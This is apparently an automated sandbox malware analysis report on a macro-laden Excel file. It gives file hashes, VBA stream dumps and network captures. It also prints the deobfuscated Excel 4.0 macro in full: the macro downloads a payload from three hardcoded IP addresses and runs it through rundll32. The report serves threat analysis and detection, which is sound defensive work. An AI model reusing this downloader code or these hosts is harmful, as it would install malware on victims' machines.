    Preview: L..................F.... .....)..{...r]peG...YipeG...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....R. .COPY-3~1.XLS..f.......Q.y.Q.y*...8.....................C.o.p.y.-.3.8.4.9.5.5.7.9.9.-.0.5.1.0.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\284992\Users.user\Desktop\Copy-384955799-05102021.xlsm.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.p.y.-.3.8.4.9.5.5.7.9.9.-.0.5.1.0.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed May 12 18:31:43 2021, atime=Wed May 12 18:31:43 2021, length=16384, window=hide
    Category:dropped
    Size (bytes):867
    Entropy (8bit):4.485342709184114
    Encrypted:false
    SSDEEP:12:85QXHLgXg/XAlCPCHaX2B8GB/naX+WnicvblbDtZ3YilMMEpxRljK5TdJP9TdJPe:8561/XTm6GcYeVDv3qsrNru/
    MD5:B3D74BBCE520A923572E79E51530BB87
    SHA1:219F5F7A24E4F4CA84AB7D18140B655E3C1E84BD
    SHA-256:198AEB37FA4C4EF4B62B3C7E5F2AAF37B30A6E1234FFCB623EBDF4FDBCF143AA
    SHA-512:F545761BB1E777896C857970321B17934BF69B936C8918D642B9D935CA4DA6432C546CAF04633F1081AF198FA9C2743C7D176F5CE5DB90A08F25BB7BEAE7B693
    Malicious:false
    Reputation:low
    Preview: L..................F...........7G...r]peG...r]peG...@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\284992\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......284992..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):124
    Entropy (8bit):4.68002329507579
    Encrypted:false
    SSDEEP:3:oyBVomxWtzIacotoQkrl+kacotoQkrlmxWtzIacotoQkrlv:djezIaco+Qkrzaco+QkrzzIaco+Qkr1
    MD5:438B9CB10BCA95DD0FEF5F9FB33DBE7F
    SHA1:A4F06BC314BDFB4B654D357BA215346E14DAD351
    SHA-256:2E405053595AE39D699D09BFB5752DDC1E1531D930D812E9C4455A552579E3BF
    SHA-512:28833687FED53233B7D18FEF346E36381B61246B2CC4F18A427E9C8C446A6128F0C04405421BA122F57D362521E9588CFDD1F0D2830E3D1FDC2CC3EABA483828
    Malicious:false
    Reputation:low
    Preview: Desktop.LNK=0..[misc]..Copy-384955799-05102021.LNK=0..Copy-384955799-05102021.LNK=0..[misc]..Copy-384955799-05102021.LNK=0..
    C:\Users\user\Desktop\A2EE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):121516
    Entropy (8bit):7.700955128895038
    Encrypted:false
    SSDEEP:3072:ExFcZ8yvKINbjvw548LMb/oqKO8NnS8+60KcFfCl:wCoAbT648LM7D98Np+ECu
    MD5:169590A9C6A507A4111995B42082C6E9
    SHA1:DF7074190121F0ECE728DE61BABA8A24829B4DE2
    SHA-256:13207099998769C526ADF159D5F00B0455FDD6761C68CAB04AB77A4BE423F6F5
    SHA-512:FEEF4CF53638D7893111F8210A9133609EE0B960ABBD6555A6E8B1FBBF0642CD1F21DDF5F3481E1C6F47762ABF67CE2032940BDF0BE308892CAEE8393D4C55B7
    Malicious:false
    Reputation:low
    Preview: .V]o.0.}.....u.M;i.&B...........%...w.(...)..|9..s?.....b.!*g+rA...+.T.....?.OR....Y..."..}.2|\z..F.X.&%...(.0<R..........y.f..v9..`...6.)c...7L..N........%...LU..V.'...V.n2Q...O..i.....@2....1<@J.X$l/g................~.!....p...;q..jN=...;....t....-4{va6vnF...j.X.B..m..".....p.+.....62..tq...)9...I..S..'....t.}...,l.;.}q..S..&....=.?`-LG^1-5.w.........C..~w..cw.?g.l}q~..@=yO......x..pO..}pS..v[.~9+...C6....>....?./...K.@.......#:v......K A..f./..........PK..........!.\..............[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\Desktop\~$Copy-384955799-05102021.xlsm
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):330
    Entropy (8bit):1.4377382811115937
    Encrypted:false
    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
    MD5:96114D75E30EBD26B572C1FC83D1D02E
    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
    Malicious:true
    Reputation:high, very likely benign file
    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

    Static File Info

    General

    File type:Microsoft Excel 2007+
    Entropy (8bit):7.687004388058775
    TrID:
    • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
    • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
    • ZIP compressed archive (8000/1) 7.58%
    File name:Copy-384955799-05102021.xlsm
    File size:117551
    MD5:3a3aae5975bd4a5512cfea2a4a5991a6
    SHA1:4ff9eafa51cdd8d979ef68dc8d0aa9ebb6168e20
    SHA256:bba463e9f1b1044f7d3b09fe0d696ebb57b1668a1fc025363731c6aefac112bd
    SHA512:4520dd5fc814372d5a76ef77376293fb5b562f2543a315ac567b1f24fcdb7da89b63da29004c2f0199e249f9319bf88945c1fd51bf40cfd3c0ef09dcf40b0d1f
    SSDEEP:3072:0f/vKINbjvw548LMb/oqKO8NnS8+60Kcdb:0faAbT648LM7D98Np+E8
    File Content Preview:PK..........!. +F.............[Content_Types].xml ...(.........................................................................................................................................................................................................

    File Icon

    Icon Hash:e4e2aa8aa4bcbcac

    Static OLE Info

    General

    Document Type:OpenXML
    Number of OLE Files:1

    OLE File "/opt/package/joesandbox/database/analysis/412131/sample/Copy-384955799-05102021.xlsm"

    Indicators

    Has Summary Info:False
    Application Name:unknown
    Encrypted Document:False
    Contains Word Document Stream:
    Contains Workbook/Book Stream:
    Contains PowerPoint Document Stream:
    Contains Visio Document Stream:
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Author:Rabota
    Last Saved By:Brifes
    Create Time:2015-06-05T18:19:34Z
    Last Saved Time:2021-05-10T15:19:38Z
    Creating Application:Microsoft Excel
    Security:0

    Document Summary

    Thumbnail Scaling Desired:false
    Company:
    Contains Dirty Links:false
    Shared Document:false
    Changed Hyperlinks:false
    Application Version:16.0300

    Streams with VBA

    VBA File Name: dfgbfdg.bas, Stream Size: 12783
    General
    Stream Path:VBA/dfgbfdg
    VBA File Name:dfgbfdg.bas
    Stream Size:12783
    Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . , . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 19 2c 00 00 00 00 00 00 01 00 00 00 92 bf 61 d3 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    VBA Code Keywords

    Keyword
    Application.Run
    Attribute
    Auto_Open()
    "dfgbfdg"
    Application.WindowState
    VB_Name
    Private
    xlMaximized
    VBA Code
    VBA File Name: gdrgdrzg.bas, Stream Size: 681
    General
    Stream Path:VBA/gdrgdrzg
    VBA File Name:gdrgdrzg.bas
    Stream Size:681
    Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 92 bf 91 ff 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    VBA Code Keywords

    Keyword
    Attribute
    VB_Name
    "gdrgdrzg"
    VBA Code
    VBA File Name: rgtrdsgrd.bas, Stream Size: 684
    General
    Stream Path:VBA/rgtrdsgrd
    VBA File Name:rgtrdsgrd.bas
    Stream Size:684
    Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 92 bf 1e ac 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    VBA Code Keywords

    Keyword
    Attribute
    "rgtrdsgrd"
    VB_Name
    VBA Code
    VBA File Name: sefsef.bas, Stream Size: 679
    General
    Stream Path:VBA/sefsef
    VBA File Name:sefsef.bas
    Stream Size:679
    Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 92 bf bf ee 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    VBA Code Keywords

    Keyword
    Attribute
    VB_Name
    "sefsef"
    VBA Code

    Streams

    Stream Path: PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 651
    General
    Stream Path:PROJECT
    File Type:ISO-8859 text, with CRLF line terminators
    Stream Size:651
    Entropy:5.48218564538
    Base64 Encoded:True
    Data ASCII:I D = " { 5 9 C 1 B 9 2 7 - 2 6 4 8 - 4 7 3 B - 8 5 A B - A F 8 5 5 3 3 B 3 C 8 D } " . . D o c u m e n t = . . . . . . . . / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = d f g b f d g . . M o d u l e = s e f s e f . . M o d u l e = r g t r d s g r d . . M o d u l e = g d r g d r z g . . D o c u m e n t = . . . . 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = . . . . 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = "
    Data Raw:49 44 3d 22 7b 35 39 43 31 42 39 32 37 2d 32 36 34 38 2d 34 37 33 42 2d 38 35 41 42 2d 41 46 38 35 35 33 33 42 33 43 38 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d dd f2 e0 ca ed e8 e3 e0 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 64 66 67 62 66 64 67 0d 0a 4d 6f 64 75 6c 65 3d 73 65 66
    Stream Path: PROJECTwm, File Type: data, Stream Size: 185
    General
    Stream Path:PROJECTwm
    File Type:data
    Stream Size:185
    Entropy:3.85386516759
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . 1 . . . 8 . A . B . 1 . . . d f g b f d g . d . f . g . b . f . d . g . . . s e f s e f . s . e . f . s . e . f . . . r g t r d s g r d . r . g . t . r . d . s . g . r . d . . . g d r g d r z g . g . d . r . g . d . r . z . g . . . . . . . 2 . . . 8 . A . B . 2 . . . . . . . 3 . . . 8 . A . B . 3 . . . . .
    Data Raw:dd f2 e0 ca ed e8 e3 e0 00 2d 04 42 04 30 04 1a 04 3d 04 38 04 33 04 30 04 00 00 cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 64 66 67 62 66 64 67 00 64 00 66 00 67 00 62 00 66 00 64 00 67 00 00 00 73 65 66 73 65 66 00 73 00 65 00 66 00 73 00 65 00 66 00 00 00 72 67 74 72 64 73 67 72 64 00 72 00 67 00 74 00 72 00 64 00 73 00 67 00 72 00 64 00 00 00 67 64 72 67 64 72 7a 67
    Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3331
    General
    Stream Path:VBA/_VBA_PROJECT
    File Type:data
    Stream Size:3331
    Entropy:4.29605456718
    Base64 Encoded:False
    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
    Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
    Stream Path: VBA/dir, File Type: data, Stream Size: 725
    General
    Stream Path:VBA/dir
    File Type:data
    Stream Size:725
    Entropy:6.57361496255
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . e . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
    Data Raw:01 d1 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 65 9d 8e 62 02 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
    Stream Path: VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 990
    General
    Stream Path:VBA/\x1051\x1080\x1089\x10901
    File Type:data
    Stream Size:990
    Entropy:3.21342337004
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 92 bf cf a9 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: VBA/\x1051\x1080\x1089\x10902, File Type: data, Stream Size: 990
    General
    Stream Path:VBA/\x1051\x1080\x1089\x10902
    File Type:data
    Stream Size:990
    Entropy:3.2143784083
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . E . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 92 bf a2 45 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: VBA/\x1051\x1080\x1089\x10903, File Type: data, Stream Size: 990
    General
    Stream Path:VBA/\x1051\x1080\x1089\x10903
    File Type:data
    Stream Size:990
    Entropy:3.21351502146
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . + . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 92 bf fe 2b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072, File Type: data, Stream Size: 994
    General
    Stream Path:VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072
    File Type:data
    Stream Size:994
    Entropy:3.23027108917
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 92 bf 9d 8b 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    Macro 4.0 Code

    ="uRlMon"!="URLDow"(0, ="http://185.14.31.59/"=NOW().dat, ..\Nuydar.veryrf, 0, 0)
    
    ,,,,,1,,,,,,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""JEIUYUITRYF"")",,,"=CONCATENATE(AG101,AH95,AG99,AG100)",=NOW(),,,,,"=CONCATENATE(AG102,AH95,AG99,AG100)",,,,,,"=CONCATENATE(AG103,AH95,AG99,AG100)",,,=HALT(),,,,"=CONCATENATE(AG106,AG107)",,,,,.d,,"=""uRlMon""",,,,at,,,,,,"=""http://185.14.31.59/""",,"=""JJCCBB""",,,,http://45.138.157.63/,,Belandes,,,,"=""http://167.114.48.59/""",,,,"=REGISTER(AI99,AH98,AI101,AI102,,1,9)",,,=GOTO(AE103),,,"=Belandes(0,AG95,AI105,0,0)",,,,..\Nuydar.veryrf,,"=IF(AE105<0, Belandes(0,AG96,AI105,0,0))",,"=""URLDow""",,,,"=IF(AE106<0, Belandes(0,AG97,AI105,0,0))",,"=""nloadToFileA""",,,,,,,,,,"=IF(AE107<0,CLOSE(0),)",,,,,,,,,,,,=GOTO(Nols!H6),,,,,
    ,"=""r""",,"=""undll32 ..\Nuydar.veryrf,DllReg""","=""isterServer""",,,,,=EXEC(I7&I9&I10),,,,=HALT(),

    Network Behavior

    Snort IDS Alerts

    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
    05/12/21-12:32:07.063368TCP1201ATTACK-RESPONSES 403 Forbidden8049167185.14.31.59192.168.2.22
    05/12/21-12:32:07.279536TCP1201ATTACK-RESPONSES 403 Forbidden804916845.138.157.63192.168.2.22
    05/12/21-12:32:08.078651TCP1201ATTACK-RESPONSES 403 Forbidden8049169167.114.48.59192.168.2.22

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    May 12, 2021 12:32:06.827209949 CEST4916780192.168.2.22185.14.31.59
    May 12, 2021 12:32:06.876507998 CEST8049167185.14.31.59192.168.2.22
    May 12, 2021 12:32:06.876682043 CEST4916780192.168.2.22185.14.31.59
    May 12, 2021 12:32:06.877918959 CEST4916780192.168.2.22185.14.31.59
    May 12, 2021 12:32:06.926110983 CEST8049167185.14.31.59192.168.2.22
    May 12, 2021 12:32:07.063368082 CEST8049167185.14.31.59192.168.2.22
    May 12, 2021 12:32:07.063433886 CEST4916780192.168.2.22185.14.31.59
    May 12, 2021 12:32:07.095103025 CEST4916880192.168.2.2245.138.157.63
    May 12, 2021 12:32:07.180423975 CEST804916845.138.157.63192.168.2.22
    May 12, 2021 12:32:07.180553913 CEST4916880192.168.2.2245.138.157.63
    May 12, 2021 12:32:07.181170940 CEST4916880192.168.2.2245.138.157.63
    May 12, 2021 12:32:07.266346931 CEST804916845.138.157.63192.168.2.22
    May 12, 2021 12:32:07.279536009 CEST804916845.138.157.63192.168.2.22
    May 12, 2021 12:32:07.279680014 CEST4916880192.168.2.2245.138.157.63
    May 12, 2021 12:32:07.297122955 CEST4916980192.168.2.22167.114.48.59
    May 12, 2021 12:32:07.423924923 CEST8049169167.114.48.59192.168.2.22
    May 12, 2021 12:32:07.424138069 CEST4916980192.168.2.22167.114.48.59
    May 12, 2021 12:32:07.424813986 CEST4916980192.168.2.22167.114.48.59
    May 12, 2021 12:32:07.551469088 CEST8049169167.114.48.59192.168.2.22
    May 12, 2021 12:32:08.078650951 CEST8049169167.114.48.59192.168.2.22
    May 12, 2021 12:32:08.078747034 CEST4916980192.168.2.22167.114.48.59
    May 12, 2021 12:33:12.064790010 CEST8049167185.14.31.59192.168.2.22
    May 12, 2021 12:33:12.064980984 CEST4916780192.168.2.22185.14.31.59
    May 12, 2021 12:33:12.282846928 CEST804916845.138.157.63192.168.2.22
    May 12, 2021 12:33:12.283106089 CEST4916880192.168.2.2245.138.157.63
    May 12, 2021 12:33:13.079571009 CEST8049169167.114.48.59192.168.2.22
    May 12, 2021 12:33:13.079791069 CEST4916980192.168.2.22167.114.48.59
    May 12, 2021 12:34:06.692468882 CEST4916980192.168.2.22167.114.48.59
    May 12, 2021 12:34:06.692816019 CEST4916880192.168.2.2245.138.157.63
    May 12, 2021 12:34:06.693105936 CEST4916780192.168.2.22185.14.31.59
    May 12, 2021 12:34:06.741274118 CEST8049167185.14.31.59192.168.2.22
    May 12, 2021 12:34:06.777682066 CEST804916845.138.157.63192.168.2.22
    May 12, 2021 12:34:06.819226980 CEST8049169167.114.48.59192.168.2.22

    HTTP Request Dependency Graph

    • 185.14.31.59
    • 45.138.157.63
    • 167.114.48.59

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249167185.14.31.5980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    May 12, 2021 12:32:06.877918959 CEST0OUTGET /44313,6048108796.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
